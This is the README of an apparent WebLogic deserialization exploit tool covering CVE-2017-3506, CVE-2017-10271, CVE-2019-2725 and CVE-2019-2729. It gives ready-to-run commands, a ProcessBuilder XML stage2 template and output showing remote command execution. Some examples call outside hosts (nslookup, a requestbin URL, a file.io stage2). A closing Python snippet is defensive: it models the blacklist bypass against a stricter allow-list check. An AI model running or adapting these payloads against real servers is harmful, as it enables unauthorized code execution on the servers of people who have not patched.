
WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit


CVE-2019-2725

WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit

Info / Help

$ python3 weblogic_exploit.py -h

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
                           [-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
                           target

positional arguments:
  target                               Target Server

optional arguments:
  -h, --help                           show this help message and exit
  -pl PAYLOAD, --payload PAYLOAD       Use one of the available payloads: (default: fs_xml_app_ctx)
                                       		- process_builder (CMD - all versions)
                                       		- unit_of_work_change_set (SERIAL - 10.x versions)
                                       		- event_data (CMD - 12.x versions)
                                       		- fs_xml_app_ctx (URL - all versions).
  -ep ENDPOINT, --endpoint ENDPOINT    Use one of the configured endpoints: (default: automatic)
                                       		- wls_wsat (CMD output)
                                       		- _async (Blind Exec).
  -c CMD, --cmd CMD                    Command to execute. (default: whoami)
  -j, --jdk6                           Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
  -u URL, --url URL                    Url to fetch stage2. Used with 'URL' payloads. (default: None)
  -y YSOSERIAL, --ysoserial YSOSERIAL  Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
  -tr TERMINAL, --terminal TERMINAL    Use one of the available terminals: cmd, bash, powershell, none (default: bash)
  -px PROXY, --proxy PROXY             Configure a proxy in the format http://127.0.0.1:8080/ (default: None)

This script will generate a valid WebLogic SOAP payload to exploit different CVEs on this web server.

Usage Examples

With the SERIAL payloads, you can pass in a cmd (to dynamically generate a ysoserial payload) or manually generate a ysoserial payload and give it to the script using the -y argument.

To dynamically generate a ysoserial payload you should download https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar and place it in the same directory as this script.

The payload unit_of_work_change_set is well known to work only in WebLogic 10.x versions. Examples:

pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0

pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0

With the URL payloads (FileSystemXmlApplicationContext) you can host your own XML and pass it with the argument -u, or let the exploit generate an ephemeral payload file for you and host it at https://file.io! This payload will be generated during the exploitation phase and will be deleted once the server fetches it remotely. If you want to host your own payload, please use the following template for this:

<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" 
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
  xsi:schemaLocation="http://www.springframework.org/schema/beans 
  http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

This payload is well known to work in all versions of WebLogic. The disadvantage of this payload is that it needs egress from the target server to fetch a stage2 payload. An example of how to use this payload is described below:

$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0

And last but not least, the process_builder payload is the most common exploit payload (metasploit module) that works in WebLogic versions not patched with the class= blacklist. This payload was customized to print the command output in the response body of the request. Example of usage:

pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked

uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Updates

29/08/2019

Added support to the event_data payload with command output in the response body. Example of usage:

$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked

uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Credits: Used part of the payload published in this GitHub repository to print the command results in the response body (https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py). Thanks for sharing this @lufeirider.

26/09/2019

Added support for CVE-2019-2729. It's a bypass that replaces <class> </class> with <array method="forName"> </array>. This bypass works only in JDK 1.6 due to a discrepancy in how this JDK version parses XML data via XMLDecoder.

The command argument -j/--jdk6 was added to the exploit script.
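The class= blacklist mentioned in the process_builder section and the CVE-2019-2729 <array method="forName"> bypass above, modelled as an added example (not code from this project and not Oracle's patch): a simplified element-name blacklist beside a stricter allow-list check, run over constructed WorkContext bodies. The element sets, the allow-list, the placeholder class name and the sample bodies are all assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Simplified model of the element-name blacklist; "class" is the element the
# CVE-2019-2725 patch denied. A model of the approach, not Oracle's code.
BLACKLISTED_ELEMENTS = {"object", "new", "method", "void", "class"}

# Assumed allow-list for a legitimate WorkContext: element names, and the only
# class= value the <java> wrapper element may carry.
ALLOWED_ELEMENTS = {"Envelope", "Header", "Body", "WorkContext", "java",
                    "string", "int", "boolean", "array"}
ALLOWED_CLASSES = {"java.beans.XMLDecoder"}

# Constructed request bodies (not captured traffic). "com.example.Loader" is a
# placeholder class name, not a gadget.
_ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
             '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
             '<java version="1.8.0" class="java.beans.XMLDecoder">{}</java>'
             '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>')
BENIGN = _ENVELOPE.format('<string>trace-id-42</string>')
CLASS_FORM = _ENVELOPE.format('<class><string>com.example.Loader</string></class>')
FORNAME_FORM = _ENVELOPE.format('<array method="forName"><string>com.example.Loader</string></array>')


def local_name(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def blacklist_check(body: str) -> bool:
    """Element-name blacklist: accept unless a denied element is present."""
    return all(local_name(el.tag) not in BLACKLISTED_ELEMENTS
               for el in ET.fromstring(body).iter())


def allowlist_check(body: str) -> bool:
    """Stricter check: every element must be allow-listed, no element may carry
    a reflective method= attribute, and class= is limited to the XMLDecoder
    wrapper. The <array method="forName"> form fails on the attribute rule."""
    for el in ET.fromstring(body).iter():
        if local_name(el.tag) not in ALLOWED_ELEMENTS:
            return False
        if "method" in el.attrib:
            return False
        if "class" in el.attrib and el.attrib["class"] not in ALLOWED_CLASSES:
            return False
    return True


if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("class", CLASS_FORM), ("forName", FORNAME_FORM)]:
        print(f"{name:8s} blacklist={blacklist_check(body)} allowlist={allowlist_check(body)}")
```

The benign body passes both checks, the <class> form fails both, and the forName form slips past the blacklist but not the allow-list, which is the gap the -j/--jdk6 option exercises.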